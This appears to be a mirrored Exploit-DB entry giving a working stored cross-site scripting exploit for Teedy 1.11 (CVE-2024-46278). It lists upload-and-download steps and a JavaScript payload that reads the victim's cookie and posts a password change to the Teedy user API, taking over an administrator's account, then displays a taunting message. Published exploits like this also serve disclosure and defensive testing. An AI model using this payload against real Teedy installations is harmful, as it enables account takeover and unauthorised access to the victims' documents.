Teedy 1.11 – Account Takeover via Stored Cross-Site Scripting (XSS) - 体验盒子

作者： Ayato Shitomi @ Fore-Z co.ltd

日期： 2025-04-16

类别：

webapps

平台：

multiple

来源：https://www.exploit-db.com/exploits/52228/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)

# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd

# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA

# Vendor Homepage: https://teedy.io/

# Software Link: https://github.com/Tomblib0/Teedy

# Version: 1.11

# Tested on: Linux

# CVE : CVE-2024-46278

There is a vulnerability that causes XSS when downloading files.

XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.

Login as an attacker’s account.

Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.

```

const currentCookie = document.cookie;

const requestOptions = {

method: 'POST',

headers: {

'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',

'Accept': 'application/json, text/plain, */*',

'Cookie': currentCookie,

'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',

'sec-ch-ua-mobile': '?0',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',

'sec-ch-ua-platform': '"Linux"',

'Origin': 'http://localhost:8080',

'Sec-Fetch-Site': 'same-origin',

'Sec-Fetch-Mode': 'cors',

'Sec-Fetch-Dest': 'empty',

'Referer': 'http://localhost:8080/',

'Accept-Encoding': 'gzip, deflate, br',

'Accept-Language': 'en-US,en;q=0.9'

},

body: 'password=superSecure2&passwordconfirm=superSecure2'

};

fetch('http://localhost:8080/api/user', requestOptions)

.then(response => {

if (!response.ok) {

throw new Error('Network response was not ok');

}

document.write('<h1>Your account was taken over by the attacker LOL</h1>');

return response.json();

})

.then(data => console.log(data))

.catch(error => console.error('There was a problem with your fetch operation:', error));

</script>

```

Login with another account. eg. admin

Click on the file uploaded by the attacker and select Download this file.